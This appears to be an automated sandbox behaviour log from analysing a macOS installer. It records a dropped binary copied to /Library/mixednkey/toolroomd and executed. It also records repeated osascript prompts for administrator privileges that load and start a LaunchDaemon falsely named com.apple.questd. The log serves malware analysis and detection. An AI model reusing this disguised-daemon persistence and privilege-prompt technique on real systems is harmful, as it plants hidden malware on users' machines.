Source: /usr/bin/osascript (PID: 649)	Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 15 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /usr/bin/osascript (PID: 653)	Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /usr/bin/osascript (PID: 657)	Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /usr/bin/osascript (PID: 674)	Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /usr/bin/osascript (PID: 681)	Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /usr/bin/osascript (PID: 685)	Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /usr/bin/osascript (PID: 689)	Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /usr/bin/osascript (PID: 693)	Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /usr/bin/osascript (PID: 697)	Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /usr/bin/osascript (PID: 724)	Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /usr/bin/osascript (PID: 732)	Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 20 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /usr/bin/osascript (PID: 661)	Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 10 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /usr/bin/osascript (PID: 665)	Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 15 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /usr/bin/osascript (PID: 669)	Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 16 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /usr/bin/osascript (PID: 677)	Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /usr/bin/osascript (PID: 701)	Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /usr/bin/osascript (PID: 705)	Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /usr/bin/osascript (PID: 709)	Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /usr/bin/osascript (PID: 713)	Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /usr/bin/osascript (PID: 717)	Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

Source: /bin/sh (PID: 644)	Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 646)	Launch agent/daemon started : launchctl start questd
Source: /bin/sh (PID: 650)	Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 651)	Launch agent/daemon started : launchctl start questd
Source: /bin/sh (PID: 654)	Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 655)	Launch agent/daemon started : launchctl start questd
Source: /bin/sh (PID: 658)	Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 659)	Launch agent/daemon started : launchctl start questd
Source: /bin/sh (PID: 675)	Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 676)	Launch agent/daemon started : launchctl start questd
Source: /bin/sh (PID: 682)	Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 683)	Launch agent/daemon started : launchctl start questd
Source: /bin/sh (PID: 686)	Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 687)	Launch agent/daemon started : launchctl start questd
Source: /bin/sh (PID: 690)	Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 691)	Launch agent/daemon started : launchctl start questd
Source: /bin/sh (PID: 694)	Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 695)	Launch agent/daemon started : launchctl start questd
Source: /bin/sh (PID: 698)	Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 699)	Launch agent/daemon started : launchctl start questd
Source: /bin/sh (PID: 725)	Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 726)	Launch agent/daemon started : launchctl start questd
Source: /bin/sh (PID: 733)	Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 662)	Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 663)	Launch agent/daemon started : launchctl start questd
Source: /bin/sh (PID: 666)	Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 667)	Launch agent/daemon started : launchctl start questd
Source: /bin/sh (PID: 670)	Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 671)	Launch agent/daemon started : launchctl start questd
Source: /bin/sh (PID: 678)	Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 679)	Launch agent/daemon started : launchctl start questd
Source: /bin/sh (PID: 702)	Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 703)	Launch agent/daemon started : launchctl start questd
Source: /bin/sh (PID: 706)	Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 707)	Launch agent/daemon started : launchctl start questd
Source: /bin/sh (PID: 710)	Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 711)	Launch agent/daemon started : launchctl start questd
Source: /bin/sh (PID: 714)	Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 715)	Launch agent/daemon started : launchctl start questd
Source: /bin/sh (PID: 718)	Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 719)	Launch agent/daemon started : launchctl start questd

Source: /bin/sh (PID: 635)	Shell process: mkdir /Library/mixednkey	Jump to behavior
Source: /bin/sh (PID: 636)	Shell process: mv /Applications/Utils/patch /Library/mixednkey/toolroomd	Jump to behavior
Source: /bin/sh (PID: 637)	Shell process: rmdir /Application/Utils	Jump to behavior
Source: /bin/sh (PID: 638)	Shell process: chmod +x /Library/mixednkey/toolroomd	Jump to behavior
Source: /bin/sh (PID: 639)	Shell process: /Library/mixednkey/toolroomd	Jump to behavior
Source: /bin/sh (PID: 642)	Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 644)	Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 646)	Shell process: launchctl start questd
Source: /bin/sh (PID: 648)	Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 650)	Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 651)	Shell process: launchctl start questd
Source: /bin/sh (PID: 652)	Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 654)	Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 655)	Shell process: launchctl start questd
Source: /bin/sh (PID: 656)	Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 658)	Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 659)	Shell process: launchctl start questd
Source: /bin/sh (PID: 672)	Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 675)	Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 676)	Shell process: launchctl start questd
Source: /bin/sh (PID: 680)	Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 682)	Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 683)	Shell process: launchctl start questd
Source: /bin/sh (PID: 684)	Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 686)	Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 687)	Shell process: launchctl start questd
Source: /bin/sh (PID: 688)	Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 690)	Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 691)	Shell process: launchctl start questd
Source: /bin/sh (PID: 692)	Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 694)	Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 695)	Shell process: launchctl start questd
Source: /bin/sh (PID: 696)	Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 698)	Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 699)	Shell process: launchctl start questd
Source: /bin/sh (PID: 723)	Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 725)	Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 726)	Shell process: launchctl start questd
Source: /bin/sh (PID: 731)	Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 733)	Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 660)	Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 662)	Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 663)	Shell process: launchctl start questd
Source: /bin/sh (PID: 664)	Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 666)	Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 667)	Shell process: launchctl start questd
Source: /bin/sh (PID: 668)	Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 670)	Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 671)	Shell process: launchctl start questd
Source: /bin/sh (PID: 673)	Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 678)	Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 679)	Shell process: launchctl start questd
Source: /bin/sh (PID: 700)	Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 702)	Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 703)	Shell process: launchctl start questd
Source: /bin/sh (PID: 704)	Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 706)	Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 707)	Shell process: launchctl start questd
Source: /bin/sh (PID: 708)	Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 710)	Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 711)	Shell process: launchctl start questd
Source: /bin/sh (PID: 712)	Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 714)	Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 715)	Shell process: launchctl start questd
Source: /bin/sh (PID: 716)	Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 718)	Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
Source: /bin/sh (PID: 719)	Shell process: launchctl start questd

Source: /System/Library/CoreServices/Installer.app/Contents/MacOS/Installer (PID: 611)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Launchservices plist file read: /Users/berri/Library/Preferences/com.apple.LaunchServices.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 642)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/bin/osascript (PID: 648)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/bin/osascript (PID: 652)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/bin/osascript (PID: 656)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/bin/osascript (PID: 672)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/bin/osascript (PID: 680)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/bin/osascript (PID: 684)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/bin/osascript (PID: 688)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/bin/osascript (PID: 692)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/bin/osascript (PID: 696)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/bin/osascript (PID: 723)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/bin/osascript (PID: 731)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /Library/AppQuest/com.apple.questd (PID: 647)	Launchservices plist file read: /Users/berri/Library/Preferences/com.apple.LaunchServices.plist
Source: /usr/bin/osascript (PID: 660)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/bin/osascript (PID: 664)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/bin/osascript (PID: 668)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/bin/osascript (PID: 673)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/bin/osascript (PID: 700)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/bin/osascript (PID: 704)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/bin/osascript (PID: 708)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/bin/osascript (PID: 712)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/bin/osascript (PID: 716)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist

Source: /usr/bin/osascript (PID: 642)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 642)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 648)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 648)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 652)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 652)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 656)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 656)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 672)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 672)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 680)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 680)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 684)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 684)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 688)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 688)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 692)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 692)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 696)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 696)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 723)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 723)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 731)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 731)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 660)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 660)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 664)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 664)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 668)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 668)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 673)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 673)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 700)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 700)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 704)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 704)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 708)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 708)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 712)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 712)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 716)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 716)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist

Source: /usr/bin/osascript (PID: 642)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 642)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 648)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 648)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 652)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 652)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 656)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 656)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 672)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 672)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 680)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 680)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 684)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
